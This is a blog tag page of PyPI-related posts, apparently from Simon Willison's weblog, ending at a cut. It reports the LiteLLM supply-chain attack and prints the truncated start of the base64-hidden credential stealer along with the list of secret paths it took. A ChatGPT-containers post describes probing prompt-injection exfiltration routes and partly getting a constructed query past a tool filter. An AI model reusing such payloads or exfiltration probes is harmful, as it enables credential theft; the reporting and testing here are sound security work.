Simon Willison's Weblog: pypi

My minute-by-minute response to the LiteLLM malware attack

2026-03-26T23:58:22+00:00

My minute-by-minute response to the LiteLLM malware attack

Callum McMahon reported the LiteLLM malware attack to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:

Confirmed. Fresh download from PyPI right now in an isolated Docker container:
Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
The malicious litellm==1.82.8 is live on PyPI right now and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.

I was chuffed to see Callum use my claude-code-transcripts tool to publish the transcript of the conversation.

Via Hacker News

Tags: pypi, security, ai, generative-ai, llms, claude, supply-chain, ai-security-research

LiteLLM Hack: Were You One of the 47,000?

2026-03-25T17:21:04+00:00

LiteLLM Hack: Were You One of the 47,000?

Daniel Hnyk used the BigQuery PyPI dataset to determine how many downloads there were of the exploited LiteLLM packages during the 46 minute period they were live on PyPI. The answer was 46,996 across the two compromised release versions (1.82.7 and 1.82.8).

They also identified 2,337 packages that depended on LiteLLM - 88% of which did not pin versions in a way that would have avoided the exploited version.

Via @hnykda

Tags: packaging, pypi, python, security, supply-chain

Package Managers Need to Cool Down

2026-03-24T21:11:38+00:00

Package Managers Need to Cool Down

Today's LiteLLM supply chain attack inspired me to revisit the idea of dependency cooldowns, the practice of only installing updated dependencies once they've been out in the wild for a few days to give the community a chance to spot if they've been subverted in some way.

This recent piece (March 4th) piece by Andrew Nesbitt reviews the current state of dependency cooldown mechanisms across different packaging tools. It's surprisingly well supported! There's been a flurry of activity across major packaging tools, including:

pnpm 10.16 (September 2025) — minimumReleaseAge with minimumReleaseAgeExclude for trusted packages
Yarn 4.10.0 (September 2025) — npmMinimalAgeGate (in minutes) with npmPreapprovedPackages for exemptions
Bun 1.3 (October 2025) — minimumReleaseAge via bunfig.toml
Deno 2.6 (December 2025) — --minimum-dependency-age for deno update and deno outdated
uv 0.9.17 (December 2025) — added relative duration support to existing --exclude-newer, plus per-package overrides via exclude-newer-package
pip 26.0 (January 2026) — --uploaded-prior-to (absolute timestamps only; relative duration support requested)
npm 11.10.0 (February 2026) — min-release-age

pip currently only supports absolute rather than relative dates but Seth Larson has a workaround for that using a scheduled cron to update the absolute date in the pip.conf config file.

Tags: javascript, packaging, pip, pypi, python, security, npm, deno, supply-chain, uv

Malicious litellm_init.pth in litellm 1.82.8 — credential stealer

2026-03-24T15:07:31+00:00

Malicious litellm_init.pth in litellm 1.82.8 — credential stealer

The LiteLLM v1.82.8 package published to PyPI was compromised with a particularly nasty credential stealer hidden in base64 in a litellm_init.pth file, which means installing the package is enough to trigger it even without running import litellm.

(1.82.7 had the exploit as well but it was in the proxy/proxy_server.py file so the package had to be imported for it to take effect.)

This issue has a very detailed description of what the credential stealer does. There's more information about the timeline of the exploit over here.

PyPI has already quarantined the litellm package so the window for compromise was just a few hours, but if you DID install the package it would have hoovered up a bewildering array of secrets, including ~/.ssh/, ~/.gitconfig, ~/.git-credentials, ~/.aws/, ~/.kube/, ~/.config/, ~/.azure/, ~/.docker/, ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.lftprc, ~/.msmtprc, ~/.my.cnf, ~/.pgpass, ~/.mongorc.js, ~/.bash_history, ~/.zsh_history, ~/.sh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history, ~/.bitcoin/, ~/.litecoin/, ~/.dogecoin/, ~/.zcash/, ~/.dashcore/, ~/.ripple/, ~/.bitmonero/, ~/.ethereum/, ~/.cardano/.

It looks like this supply chain attack started with the recent exploit against Trivy, ironically a security scanner tool that was used in CI by LiteLLM. The Trivy exploit likely resulted in stolen PyPI credentials which were then used to directly publish the vulnerable packages.

Tags: open-source, pypi, python, security, supply-chain

Distributing Go binaries like sqlite-scanner through PyPI using go-to-wheel

2026-02-04T14:59:47+00:00

I've been exploring Go for building small, fast and self-contained binary applications recently. I'm enjoying how there's generally one obvious way to do things and the resulting code is boring and readable - and something that LLMs are very competent at writing. The one catch is distribution, but it turns out publishing Go binaries to PyPI means any Go binary can be just a uvx package-name call away.

sqlite-scanner

sqlite-scanner is my new Go CLI tool for scanning a filesystem for SQLite database files.

It works by checking if the first 16 bytes of the file exactly match the SQLite magic number sequence SQLite format 3\x00. It can search one or more folders recursively, spinning up concurrent goroutines to accelerate the scan. It streams out results as it finds them in plain text, JSON or newline-delimited JSON. It can optionally display the file sizes as well.

To try it out you can download a release from the GitHub releases - and then jump through macOS hoops to execute an "unsafe" binary. Or you can clone the repo and compile it with Go. Or... you can run the binary like this:

uvx sqlite-scanner

By default this will search your current directory for SQLite databases. You can pass one or more directories as arguments:

uvx sqlite-scanner ~ /tmp

Add --json for JSON output, --size to include file sizes or --jsonl for newline-delimited JSON. Here's a demo:

uvx sqlite-scanner ~ --jsonl --size

If you haven't been uv-pilled yet you can instead install sqlite-scanner using pip install sqlite-scanner and then run sqlite-scanner.

To get a permanent copy with uv use uv tool install sqlite-scanner.

How the Python package works

The reason this is worth doing is that pip, uv and PyPI will work together to identify the correct compiled binary for your operating system and architecture.

This is driven by file names. If you visit the PyPI downloads for sqlite-scanner you'll see the following files:

sqlite_scanner-0.1.1-py3-none-win_arm64.whl
sqlite_scanner-0.1.1-py3-none-win_amd64.whl
sqlite_scanner-0.1.1-py3-none-musllinux_1_2_x86_64.whl
sqlite_scanner-0.1.1-py3-none-musllinux_1_2_aarch64.whl
sqlite_scanner-0.1.1-py3-none-manylinux_2_17_x86_64.whl
sqlite_scanner-0.1.1-py3-none-manylinux_2_17_aarch64.whl
sqlite_scanner-0.1.1-py3-none-macosx_11_0_arm64.whl
sqlite_scanner-0.1.1-py3-none-macosx_10_9_x86_64.whl

When I run pip install sqlite-scanner or uvx sqlite-scanner on my Apple Silicon Mac laptop Python's packaging magic ensures I get that macosx_11_0_arm64.whl variant.

Here's what's in the wheel, which is a zip file with a .whl extension.

In addition to the bin/sqlite-scanner the most important file is sqlite_scanner/__init__.py which includes the following:

def get_binary_path():
    """Return the path to the bundled binary."""
    binary = os.path.join(os.path.dirname(__file__), "bin", "sqlite-scanner")
 
    # Ensure binary is executable on Unix
    if sys.platform != "win32":
        current_mode = os.stat(binary).st_mode
        if not (current_mode & stat.S_IXUSR):
            os.chmod(binary, current_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
 
    return binary
 
 
def main():
    """Execute the bundled binary."""
    binary = get_binary_path()
 
    if sys.platform == "win32":
        # On Windows, use subprocess to properly handle signals
        sys.exit(subprocess.call([binary] + sys.argv[1:]))
    else:
        # On Unix, exec replaces the process
        os.execvp(binary, [binary] + sys.argv[1:])

That main() method - also called from sqlite_scanner/__main__.py - locates the binary and executes it when the Python package itself is executed, using the sqlite-scanner = sqlite_scanner:main entry point defined in the wheel.

Which means we can use it as a dependency

Using PyPI as a distribution platform for Go binaries feels a tiny bit abusive, albeit there is plenty of precedent.

I’ll justify it by pointing out that this means we can use Go binaries as dependencies for other Python packages now.

That's genuinely useful! It means that any functionality which is available in a cross-platform Go binary can now be subsumed into a Python package. Python is really good at running subprocesses so this opens up a whole world of useful tricks that we can bake into our Python tools.

To demonstrate this, I built datasette-scan - a new Datasette plugin which depends on sqlite-scanner and then uses that Go binary to scan a folder for SQLite databases and attach them to a Datasette instance.

Here's how to use that (without even installing anything first, thanks uv) to explore any SQLite databases in your Downloads folder:

uv run --with datasette-scan datasette scan ~/Downloads

If you peek at the code you'll see it depends on sqlite-scanner in pyproject.toml and calls it using subprocess.run() against sqlite_scanner.get_binary_path() in its own scan_directories() function.

I've been exploring this pattern for other, non-Go binaries recently - here's a recent script that depends on static-ffmpeg to ensure that ffmpeg is available for the script to use.

Building Python wheels from Go packages with go-to-wheel

After trying this pattern myself a couple of times I realized it would be useful to have a tool to automate the process.

I first brainstormed with Claude to check that there was no existing tool to do this. It pointed me to maturin bin which helps distribute Rust projects using Python wheels, and pip-binary-factory which bundles all sorts of other projects, but did not identify anything that addressed the exact problem I was looking to solve.

So I had Claude Code for web build the first version, then refined the code locally on my laptop with the help of more Claude Code and a little bit of OpenAI Codex too, just to mix things up.

The full documentation is in the simonw/go-to-wheel repository. I've published that tool to PyPI so now you can run it using:

uvx go-to-wheel --help

The sqlite-scanner package you can see on PyPI was built using go-to-wheel like this:

uvx go-to-wheel ~/dev/sqlite-scanner \
  --set-version-var main.version \
  --version 0.1.1 \
  --readme README.md \
  --author 'Simon Willison' \
  --url https://github.com/simonw/sqlite-scanner \
  --description 'Scan directories for SQLite databases'

This created a set of wheels in the dist/ folder. I tested one of them like this:

uv run --with dist/sqlite_scanner-0.1.1-py3-none-macosx_11_0_arm64.whl \
  sqlite-scanner --version

When that spat out the correct version number I was confident everything had worked as planned, so I pushed the whole set of wheels to PyPI using twine upload like this:

uvx twine upload dist/*

I had to paste in a PyPI API token I had saved previously.

I expect to use this pattern a lot

sqlite-scanner is very clearly meant as a proof-of-concept for this wider pattern - Python is very much capable of recursively crawling a directory structure looking for files that start with a specific byte prefix on its own!

That said, I think there's a lot to be said for this pattern. Go is a great complement to Python - it's fast, compiles to small self-contained binaries, has excellent concurrency support and a rich ecosystem of libraries.

Go is similar to Python in that it has a strong standard library. Go is particularly good for HTTP tooling - I've built several HTTP proxies in the past using Go's excellent net/http/httputil.ReverseProxy handler.

I've also been experimenting with wazero, Go's robust and mature zero dependency WebAssembly runtime as part of my ongoing quest for the ideal sandbox for running untrusted code. Here's my latest experiment with that library.

Being able to seamlessly integrate Go binaries into Python projects without the end user having to think about Go at all - they pip install and everything Just Works - feels like a valuable addition to my toolbox.

Tags: go, packaging, projects, pypi, python, sqlite, datasette, ai-assisted-programming, uv

ChatGPT Containers can now run bash, pip/npm install packages, and download files

2026-01-26T19:19:31+00:00

One of my favourite features of ChatGPT is its ability to write and execute code in a container. This feature launched as ChatGPT Code Interpreter nearly three years ago, was half-heartedly rebranded to "Advanced Data Analysis" at some point and is generally really difficult to find detailed documentation about. Case in point: it appears to have had a massive upgrade at some point in the past few months, and I can't find documentation about the new capabilities anywhere!

Here are the most notable new features:

ChatGPT can directly run Bash commands now. Previously it was limited to Python code only, although it could run shell commands via the Python subprocess module.
It has Node.js and can run JavaScript directly in addition to Python. I also got it to run "hello world" in Ruby, Perl, PHP, Go, Java, Swift, Kotlin, C and C++. No Rust yet though!
While the container still can't make outbound network requests, pip install package and npm install package both work now via a custom proxy mechanism.
ChatGPT can locate the URL for a file on the web and use a container.download tool to download that file and save it to a path within the sandboxed container.

This is a substantial upgrade! ChatGPT can now write and then test code in 10 new languages (11 if you count Bash), can find files online and download them into the container, and can install additional packages via pip and npm to help it solve problems.

(OpenAI really need to develop better habits at keeping their release notes up-to-date!)

I was initially suspicious that maybe I'd stumbled into a new preview feature that wasn't available to everyone, but I tried some experiments in a free ChatGPT account and confirmed that the new features are available there as well.

container.download

My first clue to the new features came the other day when I got curious about Los Angeles air quality, in particular has the growing number of electric vehicles there had a measurable impact?

I prompted a fresh GPT-5.2 Thinking session with:

Show me Los Angeles air quality over time for last 20 years

Here's the shared transcript. Annoyingly that doesn't make the thinking trace available, so here's a screenshot:

This bit instantly caught my eye:

[...] The URL from the error message leads to an Excel file containing air quality trends. I can use the container.download tool to fetch it. [...]

What's container.download? I asked ChatGPT:

Without running any searches tell me about your container.download tool

And got back:

Sure. container.download is a built-in tool I can call that fetches a file from a URL and saves it into the sandboxed container filesystem for this chat session.

What it does

Takes a publicly reachable URL and a destination filepath in the container.

Downloads the bytes from that URL and writes them to the given path.

After that, I can read/process the file locally in the container (e.g., unzip it, parse it with Python, open it as an image, convert it, etc.).

Signature (inputs)

It’s called like this (conceptually):
{
  "url": "https://example.com/somefile.zip",
  "filepath": "/mnt/data/somefile.zip"
}

Further experimentation confirmed that container.download behaves as described.

I had it download one file from a server with logs enabled and captured the IP address and user-agent. Here are the most interesting headers:

User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, image/avif, image/webp, image/apng, */*;q=0.8, application/signed-exchange;v=b3;q=0.9
Cf-Connecting-Ip: 52.230.164.178

That 52.230.164.178 IP address resolves to Microsoft Azure Cloud (centralus) in Des Moines, Iowa.

Is container.download a data exfiltration vulnerability?

On the one hand, this is really useful! ChatGPT can navigate around websites looking for useful files, download those files to a container and then process them using Python or other languages.

Is this a data exfiltration vulnerability though? Could a prompt injection attack trick ChatGPT into leaking private data out to a container.download call to a URL with a query string that includes sensitive information?

I don't think it can. I tried getting it to assemble a URL with a query string and access it using container.download and it couldn't do it. It told me that it got back this error:

ERROR: download failed because url not viewed in conversation before. open the file or url using web.run first.

This looks to me like the same safety trick used by Claude's Web Fetch tool: only allow URL access if that URL was either directly entered by the user or if it came from search results that could not have been influenced by a prompt injection.

(I poked at this a bit more and managed to get a simple constructed query string to pass through web.run - a different tool entirely - but when I tried to compose a longer query string containing the previous prompt history a web.run filter blocked it.)

So I think this is all safe, though I'm curious if it could hold firm against a more aggressive round of attacks from a seasoned security researcher.

Bash and other languages

The key lesson from coding agents like Claude Code and Codex CLI is that Bash rules everything: if an agent can run Bash commands in an environment it can do almost anything that can be achieved by typing commands into a computer.

When Anthropic added their own code interpreter feature to Claude last September they built that around Bash rather than just Python. It looks to me like OpenAI have now done the same thing for ChatGPT.

Here's what ChatGPT looks like when it runs a Bash command - here my prompt was:

npm install a fun package and demonstrate using it

It's useful to click on the "Thinking" or "Thought for 32s" links as that opens the Activity sidebar with a detailed trace of what ChatGPT did to arrive at its answer. This helps guard against cheating - ChatGPT might claim to have run Bash in the main window but it can't fake those black and white logs in the Activity panel.

I had it run Hello World in various languages later in that same session.

Installing packages from pip and npm

In the previous example ChatGPT installed the cowsay package from npm and used it to draw an ASCII-art cow. But how could it do that if the container can't make outbound network requests?

In another session I challenged it to explore its environment. and figure out how that worked.

Here's the resulting Markdown report it created.

The key magic appears to be a applied-caas-gateway1.internal.api.openai.org proxy, available within the container and with various packaging tools configured to use it.

The following environment variables cause pip and uv to install packages from that proxy instead of directly from PyPI:

PIP_INDEX_URL=https://reader:****@packages.applied-caas-gateway1.internal.api.openai.org/.../pypi-public/simple
PIP_TRUSTED_HOST=packages.applied-caas-gateway1.internal.api.openai.org
UV_INDEX_URL=https://reader:****@packages.applied-caas-gateway1.internal.api.openai.org/.../pypi-public/simple
UV_INSECURE_HOST=https://packages.applied-caas-gateway1.internal.api.openai.org

This one appears to get npm to work:

NPM_CONFIG_REGISTRY=https://reader:****@packages.applied-caas-gateway1.internal.api.openai.org/.../npm-public

And it reported these suspicious looking variables as well:

CAAS_ARTIFACTORY_BASE_URL=packages.applied-caas-gateway1.internal.api.openai.org
CAAS_ARTIFACTORY_PYPI_REGISTRY=.../artifactory/api/pypi/pypi-public
CAAS_ARTIFACTORY_NPM_REGISTRY=.../artifactory/api/npm/npm-public
CAAS_ARTIFACTORY_GO_REGISTRY=.../artifactory/api/go/golang-main
CAAS_ARTIFACTORY_MAVEN_REGISTRY=.../artifactory/maven-public
CAAS_ARTIFACTORY_GRADLE_REGISTRY=.../artifactory/gradle-public
CAAS_ARTIFACTORY_CARGO_REGISTRY=.../artifactory/api/cargo/cargo-public/index
CAAS_ARTIFACTORY_DOCKER_REGISTRY=.../dockerhub-public
CAAS_ARTIFACTORY_READER_USERNAME=reader
CAAS_ARTIFACTORY_READER_PASSWORD=****
NETWORK=caas_packages_only

Neither Rust nor Docker are installed in the container environment, but maybe those registry references are a clue of features still to come.

Adding it all together

The result of all of this? You can tell ChatGPT to use Python or Node.js packages as part of a conversation and it will be able to install them and apply them against files you upload or that it downloads from the public web. That's really cool.

The big missing feature here should be the easiest to provide: we need official documentation! A release notes entry would be a good start, but there are a lot of subtle details to how this new stuff works, its limitations and what it can be used for.

As always, I'd also encourage OpenAI to come up with a name for this set of features that properly represents how it works and what it can do.

In the meantime, I'm going to call this ChatGPT Containers.

Update: a full list of tools

I decided to ask ChatGPT about other tools that were available to it in case there was anything interesting in there:

List all tools that are available to you, with their exact names and descriptions and signatures

Here's what I got back.

List of ChatGPT tools according to GPT-5.2 Thinking on 26th January 2026

Below are all tools available to me in this chat, with their exact names, descriptions, and signatures (as defined in my tool interface).

python

`python.exec` (FREEFORM) → any

Description: Execute Python code in a Jupyter environment for private/internal reasoning (not shown to you). Internet access is disabled.
Signature: python.exec(FREEFORM) -> any

web

`web.run` (ToolCallV5 JSON) → any

Description: Access the internet and specialized lookups (search, open/click/find pages, screenshot PDFs, image search, product search, finance, weather, sports, calculator, time). Supports citations via returned turn... reference IDs.
Signature:
web.run({ open?, click?, find?, screenshot?, image_query?, product_query?, sports?, finance?, weather?, calculator?, time?, search_query?, response_length? }) -> any

automations

`automations.create` → any

Description: Schedule a future/recurring task/reminder/search via iCal VEVENT.
Signature:
automations.create({ prompt: string, title: string, schedule?: string, dtstart_offset_json?: string }) -> any

`automations.update` → any

Description: Modify an existing scheduled task.
Signature:
automations.update({ jawbone_id: string, schedule?: string, dtstart_offset_json?: string, prompt?: string, title?: string, is_enabled?: boolean }) -> any

`automations.list` → any

Description: List existing automations.
Signature: automations.list() -> any

guardian_tool

`guardian_tool.get_policy` → str

Description: Retrieve policy guidance for specific categories (currently: election_voting).
Signature: guardian_tool.get_policy({ category: string }) -> str

file_search

`file_search.msearch` → any

Description: Search across available internal/connected sources (in this environment: primarily “recording_knowledge” transcripts when relevant).
Signature:
file_search.msearch({ queries?: string[], source_filter?: string[], file_type_filter?: string[], intent?: string, time_frame_filter?: { start_date?: string, end_date?: string } }) -> any

`file_search.mclick` → any

Description: Expand/open previously returned search results (or connector URLs) for more context.
Signature:
file_search.mclick({ pointers?: string[], start_date?: string, end_date?: string }) -> any

gmail (read-only)

`gmail.search_email_ids` → any

Description: Search Gmail message IDs by query/tags (read-only).
Signature:
gmail.search_email_ids({ query?: string, tags?: string[], max_results?: integer, next_page_token?: string }) -> any

`gmail.batch_read_email` → any

Description: Read a batch of Gmail messages by message IDs (read-only).
Signature:
gmail.batch_read_email({ message_ids: string[] }) -> any

gcal (read-only)

`gcal.search_events` → any

Description: Search Google Calendar events in a time range and/or by keyword (read-only).
Signature:
gcal.search_events({ time_min?: string, time_max?: string, timezone_str?: string, max_results?: integer, query?: string, calendar_id?: string, next_page_token?: string }) -> any

`gcal.read_event` → any

Description: Read a specific calendar event by ID (read-only).
Signature:
gcal.read_event({ event_id: string, calendar_id?: string }) -> any

gcontacts (read-only)

`gcontacts.search_contacts` → any

Description: Search Google Contacts by keyword (read-only).
Signature:
gcontacts.search_contacts({ query: string, max_results?: integer }) -> any

canmore (canvas)

`canmore.create_textdoc` → any

Description: Create a new canvas text document (markdown or code).
Signature:
canmore.create_textdoc({ name: string, type: "document" | "code/bash" | "code/zsh" | "code/javascript" | "code/typescript" | "code/html" | "code/css" | "code/python" | "code/json" | "code/sql" | "code/go" | "code/yaml" | "code/java" | "code/rust" | "code/cpp" | "code/swift" | "code/php" | "code/xml" | "code/ruby" | "code/haskell" | "code/kotlin" | "code/csharp" | "code/c" | "code/objectivec" | "code/r" | "code/lua" | "code/dart" | "code/scala" | "code/perl" | "code/commonlisp" | "code/clojure" | "code/ocaml" | "code/powershell" | "code/verilog" | "code/dockerfile" | "code/vue" | "code/react" | "code/other", content: string }) -> any

`canmore.update_textdoc` → any

Description: Apply regex-based edits to the current canvas textdoc.
Signature:
canmore.update_textdoc({ updates: { pattern: string, multiple?: boolean, replacement: string }[] }) -> any

`canmore.comment_textdoc` → any

Description: Add actionable comments on matched regions of the current canvas textdoc.
Signature:
canmore.comment_textdoc({ comments: { pattern: string, comment: string }[] }) -> any

python_user_visible

`python_user_visible.exec` (FREEFORM) → any

Description: Execute Python code that you will see (tables, plots, generated files). Internet disabled.
Signature: python_user_visible.exec(FREEFORM) -> any

user_info

`user_info.get_user_info` → any

Description: Get your current location and local time (or UTC if unknown).
Signature: user_info.get_user_info({}) -> any

summary_reader

`summary_reader.read` → any

Description: Read safe-to-share internal reasoning summaries from earlier turns (used when asked how I arrived at something).
Signature: summary_reader.read({ limit?: integer, offset?: integer }) -> any

container

`container.exec` → any

Description: Run a command inside the container and return stdout/stderr.
Signature:
container.exec({ cmd: string[], session_name?: string | null, workdir?: string | null, timeout?: integer | null, env?: object | null, user?: string | null }) -> any

`container.feed_chars` → any

Description: Send input to a running interactive exec session and flush output.
Signature:
container.feed_chars({ session_name: string, chars: string, yield_time_ms?: integer }) -> any

`container.open_image` → any

Description: Display an image from an absolute path in the container (jpg/jpeg/png/webp).
Signature:
container.open_image({ path: string, user?: string | null }) -> any

`container.download` → any

Description: Download a file from a URL into the container filesystem.
Signature:
container.download({ url: string, filepath: string }) -> any

bio (memory)

`bio.update` (FREEFORM) → any

Description: Persist (or forget) user-specific info across conversations (“memory”).
Signature: bio.update(FREEFORM) -> any

api_tool

`api_tool.list_resources` → any

Description: List available “resources” (including invokable tools) in an OP-style file tree.
Signature:
api_tool.list_resources({ path?: string, cursor?: string | null, only_tools?: boolean, refetch_tools?: boolean }) -> any

`api_tool.call_tool` → any

Description: Invoke a resource as a tool (must know its full path/URI from list_resources).
Signature:
api_tool.call_tool({ path: string, args: object }) -> any

personal_context

`personal_context.search` → any

Description: Retrieve user-specific context from prior interactions/linked sources to maintain continuity.
Signature:
personal_context.search({ query: string }) -> any

image_gen

`image_gen.text2im` → any

Description: Generate or edit images from text instructions (and optionally referenced image IDs).
Signature:
image_gen.text2im({ prompt?: string | null, size?: string | null, n?: integer | null, transparent_background?: boolean | null, is_style_transfer?: boolean | null, referenced_image_ids?: string[] | null }) -> any

user_settings

`user_settings.get_user_settings` → any

Description: Read current settings and allowed values (personality, accent color, appearance).
Signature: user_settings.get_user_settings() -> any

`user_settings.set_setting` → any

Description: Change one setting (accent color, appearance, or personality) to an allowed value.
Signature:
user_settings.set_setting({ setting_name: "accent_color" | "appearance" | "personality", setting_value: string }) -> any

artifact_handoff

`artifact_handoff.prepare_artifact_generation` → any

Description: Must be called immediately when the user asks for a spreadsheet or slide deck artifact.
Signature: artifact_handoff.prepare_artifact_generation() -> any

Tags: pypi, sandboxing, npm, ai, openai, generative-ai, chatgpt, llms, ai-assisted-programming, code-interpreter

PyPI: Preventing Domain Resurrection Attacks

2025-08-19T15:36:44+00:00

PyPI: Preventing Domain Resurrection Attacks

Domain resurrection attacks are a nasty vulnerability in systems that use email verification to allow people to recover their accounts. If somebody lets their domain name expire an attacker might snap it up and use it to gain access to their accounts - which can turn into a package supply chain attack if they had an account on something like the Python Package Index.

PyPI now protects against these by treating an email address as not-validated if the associated domain expires.

Since early June 2025, PyPI has unverified over 1,800 email addresses when their associated domains entered expiration phases. This isn't a perfect solution, but it closes off a significant attack vector where the majority of interactions would appear completely legitimate.

This attack is not theoretical: it happened to the ctx package on PyPI back in May 2022.

Here's the pull request from April in which Mike Fiedler landed an integration which hits an API provided by Fastly's Domainr, followed by this PR which polls for domain status on any email domain that hasn't been checked in the past 30 days.

Via Hacker News

Tags: domains, pypi, python, security, supply-chain

Introducing OSS Rebuild: Open Source, Rebuilt to Last

2025-07-23T17:16:32+00:00

Introducing OSS Rebuild: Open Source, Rebuilt to Last

Major news on the Reproducible Builds front: the Google Security team have announced OSS Rebuild, their project to provide build attestations for open source packages released through the NPM, PyPI and Crates ecosystom (and more to come).

They currently run builds against the "most popular" packages from those ecosystems:

Through automation and heuristics, we determine a prospective build definition for a target package and rebuild it. We semantically compare the result with the existing upstream artifact, normalizing each one to remove instabilities that cause bit-for-bit comparisons to fail (e.g. archive compression). Once we reproduce the package, we publish the build definition and outcome via SLSA Provenance. This attestation allows consumers to reliably verify a package's origin within the source history, understand and repeat its build process, and customize the build from a known-functional baseline

The only way to interact with the Rebuild data right now is through their Go CLI tool. I reverse-engineered it using Gemini 2.5 Pro and derived this command to get a list of all of their built packages:

 gsutil ls -r 'gs://google-rebuild-attestations/**'

There are 9,513 total lines, here's a Gist. I used Claude Code to count them across the different ecosystems (discounting duplicates for different versions of the same package):

pypi: 5,028 packages
cratesio: 2,437 packages
npm: 2,048 packages

Then I got a bit ambitious... since the files themselves are hosted in a Google Cloud Bucket, could I run my own web app somewhere on storage.googleapis.com that could use fetch() to retrieve that data, working around the lack of open CORS headers?

I got Claude Code to try that for me (I didn't want to have to figure out how to create a bucket and configure it for web access just for this one experiment) and it built and then deployed https://storage.googleapis.com/rebuild-ui/index.html, which did indeed work!

It lets you search against that list of packages from the Gist and then select one to view the pretty-printed newline-delimited JSON that was stored for that package.

The output isn't as interesting as I was expecting, but it was fun demonstrating that it's possible to build and deploy web apps to Google Cloud that can then make fetch() requests to other public buckets.

Hopefully the OSS Rebuild team will add a web UI to their project at some point in the future.

Via Hacker News

Tags: google, packaging, pypi, security, npm, ai, generative-ai, llms, ai-assisted-programming, supply-chain, vibe-coding, claude-code

crates.io: Trusted Publishing

2025-07-12T16:12:18+00:00

crates.io: Trusted Publishing

crates.io is the Rust ecosystem's equivalent of PyPI. Inspired by PyPI's GitHub integration (see my TIL, I use this for dozens of my packages now) they've added a similar feature:

Trusted Publishing eliminates the need for GitHub Actions secrets when publishing crates from your CI/CD pipeline. Instead of managing API tokens, you can now configure which GitHub repository you trust directly on crates.io.

They're missing one feature that PyPI has: on PyPI you can create a "pending publisher" for your first release. crates.io currently requires the first release to be manual:

To get started with Trusted Publishing, you'll need to publish your first release manually. After that, you can set up trusted publishing for future releases.

Via @charliermarsh

Tags: github, packaging, pypi, rust

My First Open Source AI Generated Library

2025-06-21T23:22:45+00:00

My First Open Source AI Generated Library

Armin Ronacher had Claude and Claude Code do almost all of the work in building, testing, packaging and publishing a new Python library based on his design:

It wrote ~1100 lines of code for the parser

It wrote ~1000 lines of tests

It configured the entire Python package, CI, PyPI publishing

Generated a README, drafted a changelog, designed a logo, made it theme-aware

Did multiple refactorings to make me happier

The project? sloppy-xml-py, a lax XML parser (and violation of everything the XML Working Group hold sacred) which ironically is necessary because LLMs themselves frequently output "XML" that includes validation errors.

Claude's SVG logo design is actually pretty decent, turns out it can draw more than just bad pelicans!

I think experiments like this are a really valuable way to explore the capabilities of these models. Armin's conclusion:

This was an experiment to see how far I could get with minimal manual effort, and to unstick myself from an annoying blocker. The result is good enough for my immediate use case and I also felt good enough to publish it to PyPI in case someone else has the same problem.

Treat it as a curious side project which says more about what's possible today than what's necessarily advisable.

I'd like to present a slightly different conclusion here. The most interesting thing about this project is that the code is good.

My criteria for good code these days is the following:

Solves a defined problem, well enough that I'm not tempted to solve it in a different way
Uses minimal dependencies
Clear and easy to understand
Well tested, with tests prove that the code does what it's meant to do
Comprehensive documentation
Packaged and published in a way that makes it convenient for me to use
Designed to be easy to maintain and make changes in the future

sloppy-xml-py fits all of those criteria. It's useful, well defined, the code is readable with just about the right level of comments, everything is tested, the documentation explains everything I need to know, and it's been shipped to PyPI.

I'd be proud to have written this myself.

This example is not an argument for replacing programmers with LLMs. The code is good because Armin is an expert programmer who stayed in full control throughout the process. As I wrote the other day, a skilled individual with both deep domain understanding and deep understanding of the capabilities of the agent.

Via @mitsuhiko.at

Tags: armin-ronacher, open-source, pypi, python, xml, ai, generative-ai, llms, ai-assisted-programming, claude, claude-code

astral-sh/ty

2025-05-07T18:37:33+00:00

astral-sh/ty

Astral have been working on this "extremely fast Python type checker and language server, written in Rust" quietly but in-the-open for a while now. Here's the first alpha public release - albeit not yet announced - as ty on PyPI (nice donated two-letter name!)

You can try it out via uvx like this - run the command in a folder full of Python code and see what comes back:

uvx ty check

I got zero errors for my recent, simple condense-json library and a ton of errors for my more mature sqlite-utils library - output here.

It really is fast:

cd /tmp
git clone https://github.com/simonw/sqlite-utils
cd sqlite-utils
time uvx ty check

Reports it running in around a tenth of a second (0.109 total wall time) using multiple CPU cores:

uvx ty check  0.18s user 0.07s system 228% cpu 0.109 total

Running time uvx mypy . in the same folder (both after first ensuring the underlying tools had been cached) took around 7x longer:

uvx mypy .  0.46s user 0.09s system 74% cpu 0.740 total

This isn't a fair comparison yet as ty still isn't feature complete in comparison to mypy.

Via Hacker News

Tags: pypi, python, rust, mypy, uv, astral, ty

Making PyPI's test suite 81% faster

2025-05-01T21:32:18+00:00

Making PyPI's test suite 81% faster

Fantastic collection of tips from Alexis Challande on speeding up a Python CI workflow.

I've used pytest-xdist to run tests in parallel (across multiple cores) before, but the following tips were new to me:

COVERAGE_CORE=sysmon pytest --cov=myproject tells coverage.py on Python 3.12 and higher to use the new sys.monitoring mechanism, which knocked their test execution time down from 58s to 27s.
Setting testpaths = ["tests/"] in pytest.ini lets pytest skip scanning other folders when trying to find tests.
python -X importtime ... shows a trace of exactly how long every package took to import. I could have done with this last week when I was trying to debug slow LLM startup time which turned out to be caused be heavy imports.

Via lobste.rs

Tags: performance, pypi, python, pytest

Using pip to install a Large Language Model that's under 100MB

2025-02-07T06:34:59+00:00

I just released llm-smollm2, a new plugin for LLM that bundles a quantized copy of the SmolLM2-135M-Instruct LLM inside of the Python package.

This means you can now pip install a full LLM!

If you're already using LLM you can install it like this:

llm install llm-smollm2

Then run prompts like this:

llm -m SmolLM2 'Are dogs real?'

(New favourite test prompt for tiny models, courtesy of Tim Duffy. Here's the result).

If you don't have LLM yet first follow these installation instructions, or brew install llm or pipx install llm or uv tool install llm depending on your preferred way of getting your Python tools.

If you have uv setup you don't need to install anything at all! The following command will spin up an ephemeral environment, install the necessary packages and start a chat session with the model all in one go:

